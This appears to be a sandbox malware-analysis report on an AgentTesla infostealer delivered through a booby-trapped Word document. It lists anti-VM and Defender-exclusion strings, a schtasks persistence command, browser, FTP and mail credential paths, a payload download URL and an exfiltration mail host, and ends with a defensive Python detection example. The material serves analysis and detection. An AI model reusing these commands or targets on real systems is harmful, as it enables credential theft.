Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Thread delayed: delay time: 40000
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Thread delayed: delay time: 30000
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2096028933.000000000020B000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Code function: 7_2_0040418A LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Memory written: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Queries volume information: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347727555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY
Source: Yara match | File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY
Source: Yara match | File source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: Yara match | File source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY
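As an added example (not part of the Joe Sandbox report and not the sandbox's own signature logic), the Python below turns four behaviours listed in the Malware Analysis System Evasion, HIPS / PFW / Operating System Protection Evasion and Stealing of Sensitive Information sections into detection checks and runs them over constructed process-creation, WMI-query and file-open events modelled on the report's lines. The event schema (field names), the temp-path pattern, the set of VM-revealing WMI classes and the "two or more distinct stores / classes per process" thresholds are assumptions chosen for the example, not values the report states.

```python
"""Detection checks for behaviours this report attributes to the sample,
run over constructed events. Added example; not from the Joe Sandbox report."""
import re

# Constructed sample events modelled on the report's "Process created",
# "WMI Queries" and "File opened" lines. The field names are an assumed
# schema, not a real sensor's.
SAMPLE_EVENTS = [
    {"type": "process_create",
     "parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe",
     "cmdline": r"C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe"},
    {"type": "process_create",
     "parent": r"C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' "
                r"/XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'"},
    {"type": "wmi_query", "process": "rghbyjuyktyjrthbgvfsfhytrrgfsd.exe", "class": "Win32_BaseBoard"},
    {"type": "wmi_query", "process": "rghbyjuyktyjrthbgvfsfhytrrgfsd.exe", "class": "Win32_NetworkAdapterConfiguration"},
    {"type": "wmi_query", "process": "rghbyjuyktyjrthbgvfsfhytrrgfsd.exe", "class": "Win32_Processor"},
    {"type": "file_open", "process": "rghbyjuyktyjrthbgvfsfhytrrgfsd.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file_open", "process": "rghbyjuyktyjrthbgvfsfhytrrgfsd.exe",
     "path": r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"},
    # Benign noise (also constructed): an admin task created from a script
    # directory, an inventory tool's single WMI lookup, and Firefox reading
    # its own profile list. None of these should fire.
    {"type": "process_create", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /Create /TN 'Backup' /XML 'C:\Scripts\backup.xml'"},
    {"type": "wmi_query", "process": "inventory.exe", "class": "Win32_Processor"},
    {"type": "file_open", "process": "firefox.exe",
     "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
]

# Assumed patterns and thresholds (tune to the environment).
TEMP_PATH = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
SCHTASKS_XML = re.compile(r"/Create\b.*?/XML\s+'?\"?([^'\"]+)", re.IGNORECASE)
VM_FINGERPRINT_CLASSES = {"Win32_BaseBoard", "Win32_Bios", "Win32_NetworkAdapter",
                          "Win32_NetworkAdapterConfiguration", "Win32_Processor"}
CREDENTIAL_STORES = (  # path fragments taken from the "File opened" lines above
    r"\Google\Chrome\User Data\Default\Login Data",
    r"\Mozilla\Firefox\profiles.ini",
    r"\Thunderbird\profiles.ini",
    r"\FileZilla\recentservers.xml",
    r"\SmartFTP\Client 2.0\Favorites\Quick Connect",
)


def detect_equation_editor_child(ev):
    """Equation Editor never legitimately spawns children; any child is suspect."""
    return ev["type"] == "process_create" and ev["parent"].lower().endswith("\\eqnedt32.exe")


def detect_task_from_temp(ev):
    """schtasks /Create whose /XML definition lives in a temp directory."""
    if ev["type"] != "process_create" or not ev["image"].lower().endswith("\\schtasks.exe"):
        return False
    m = SCHTASKS_XML.search(ev["cmdline"])
    return bool(m and TEMP_PATH.search(m.group(1)))


def detect_vm_fingerprinting(events, threshold=2):
    """Per process, count distinct VM-revealing WMI classes; one lookup is normal,
    several in one process match the report's anti-VM behaviour."""
    seen = {}
    for ev in events:
        if ev["type"] == "wmi_query" and ev["class"] in VM_FINGERPRINT_CLASSES:
            seen.setdefault(ev["process"], set()).add(ev["class"])
    return {p: sorted(c) for p, c in seen.items() if len(c) >= threshold}


def detect_credential_store_access(events, threshold=2):
    """Per process, count distinct credential stores touched. A browser opening
    its own profile is one store; a stealer walks several."""
    seen = {}
    for ev in events:
        if ev["type"] != "file_open":
            continue
        for fragment in CREDENTIAL_STORES:
            if fragment.lower() in ev["path"].lower():
                seen.setdefault(ev["process"], set()).add(fragment)
    return {p: len(s) for p, s in seen.items() if len(s) >= threshold}


def run_detections(events):
    """Return (rule_name, detail) pairs in a stable order."""
    hits = []
    for ev in events:
        if detect_equation_editor_child(ev):
            hits.append(("eqnedt32_spawn", ev["image"]))
        if detect_task_from_temp(ev):
            hits.append(("schtasks_xml_from_temp", ev["cmdline"]))
    for proc, classes in detect_vm_fingerprinting(events).items():
        hits.append(("wmi_vm_fingerprint", proc + ": " + ", ".join(classes)))
    for proc, count in detect_credential_store_access(events).items():
        hits.append(("credential_store_access", proc + ": " + str(count) + " stores"))
    return hits


if __name__ == "__main__":
    for rule, detail in run_detections(SAMPLE_EVENTS):
        print(rule, "->", detail)
```

The per-process thresholds are the point of the last two rules: a single Win32_Processor query or a single profiles.ini read is everyday noise, while one process that touches several VM-revealing classes, or several unrelated credential stores, matches what this report records for the dropped executable.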

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347727555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY
Source: Yara match | File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY
Source: Yara match | File source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (211) | Scheduled Task/Job (1) | Process Injection (112) | Disable or Modify Tools (11) | OS Credential Dumping (2) | File and Directory Discovery (1) | Remote Services | Archive Collected Data (11) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (12) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution (13) | Boot or Logon Initialization Scripts | Scheduled Task/Job (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | System Information Discovery (114) | Remote Desktop Protocol | Data from Local System (2) | Exfiltration Over Bluetooth | Encrypted Channel (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter (1) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (3) | Security Account Manager | Query Registry (1) | SMB/Windows Admin Shares | Email Collection (1) | Automated Exfiltration | Non-Standard Port (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Scheduled Task/Job (1) | Logon Script (Mac) | Logon Script (Mac) | Software Packing (2) | NTDS | Security Software Discovery (211) | Distributed Component Object Model | Clipboard Data (1) | Scheduled Transfer | Non-Application Layer Protocol (2) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading (1) | LSA Secrets | Process Discovery (2) | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol (32) | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion (141) | Cached Domain Credentials | Virtualization/Sandbox Evasion (141) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection (112) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Numbers in parentheses are the signature counts the report attaches to each matched technique; cells without a number are unmatched techniques shown for matrix completeness.

                  Behavior Graph

Behavior Graph ID: 385437 | Sample: RFQ ..doc | Startdate: 12/04/2021 | Architecture: WINDOWS | Score: 100

Top-level signatures: Found malware configuration; Antivirus detection for URL or domain; Sigma detected: Scheduled temp file as task from temp location; 9 other signatures

Process tree recovered from the graph (indentation shows parent/child; the numbers after a process name are the graph's file/registry counters):

WINWORD.EXE 336 20, started
EQNEDT32.EXE, started
EQNEDT32.EXE 11, started
  DNS/IP: rotronics.com.ph 203.167.7.88, ports 49167, 80, IWEB-ASCA Philippines
  Dropped: C:\...\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe (PE32); C:\Users\user\...\ZhIOjFmINIXbKXm[1].exe (PE32)
  Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  rghbyjuyktyjrthbgvfsfhytrrgfsd.exe 1 8, started
    Dropped: C:\Users\user\AppData\...\cAFIUeWyVQPJe.exe (PE32); C:\Users\user\AppData\Local\...\tmpBFD6.tmp (XML)
    Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); 2 other signatures
    schtasks.exe, started
    rghbyjuyktyjrthbgvfsfhytrrgfsd.exe 4, started
      DNS/IP: mail.privateemail.com 198.54.122.60, ports 49168, 49169, 49171, NAMECHEAP-NETUS United States
      Signatures: Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)


                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  No Antivirus matches

                  Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe | 100% | Joe Sandbox ML |

                  Unpacked PE Files

Source | Detection | Scanner | Label
7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1138205

                  Domains

Source | Detection | Scanner | Label
rotronics.com.ph | 0% | Virustotal |

                  URLs

Source | Detection | Scanner | Label
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | 0% | URL Reputation | safe
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://www.e-me.lv/repository0 | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://www.acabogacia.org/doc0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://WWI0qtWzJvCpYcgDStzT.orgDL | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://www.ancert.com/cps0 | 0% | URL Reputation | safe
http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exe | 100% | Avira URL Cloud | malware
http://www.dnie.es/dpc0 | 0% | URL Reputation | safe
http://www.acabogacia.org0 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://crl.lt/root-c/cacrl.crl0 | 0% | Avira URL Cloud | safe
http://WWI0qtWzJvCpYcgDStzT.org | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://www.sk.ee/cps/0 | 0% | URL Reputation | safe
http://www.quovadis.bm0 | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://ZAGYny.com | 0% | Avira URL Cloud | safe
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://www.netlock.net/docs | 0% | URL Reputation | safe
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://www.e-trust.be/CPS/QNcerts | 0% | URL Reputation | safe

Most of these are CRL, OCSP and CPS URLs carried in embedded certificate data (the trailing "0" is a byte of the DER encoding that the string extractor picked up); the only URL with a detection is the download location of the dropped executable.

                  Domains and IPs

                  Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
rotronics.com.ph | 203.167.7.88 | true | true | | unknown
mail.privateemail.com | 198.54.122.60 | true | false | | high

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exe | true | Avira URL Cloud: malware | unknown

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.certicamara.com/certicamaraca.crl0 | rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | false | | high
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://127.0.0.1:HTTP/1.1 | rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://DynDns.comDynDNS | rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.e-me.lv/repository0 | rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://sectigo.com/CPS0 | rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.acabogacia.org/doc0 | rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://crl.entrust.net/server1.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                        high
                        http://ocsp.sectigo.com0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://WWI0qtWzJvCpYcgDStzT.orgDLrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%harghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://ocsp.entrust.net03rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.ancert.com/cps0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.dnie.es/dpc0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.acabogacia.org0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://rca.e-szigno.hu/ocsp0-rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                          high
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.diginotar.nl/cps/pkioverheid0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://repository.swisssign.com/0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                            high
                            http://crl.lt/root-c/cacrl.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://mail.privateemail.comrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmpfalse
                              high
                              http://WWI0qtWzJvCpYcgDStzT.orgrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350816750.0000000002C06000.00000004.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350857695.0000000002C4E000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpfalse
                                high
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.certicamara.com/certicamaraca.crl0;rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                    high
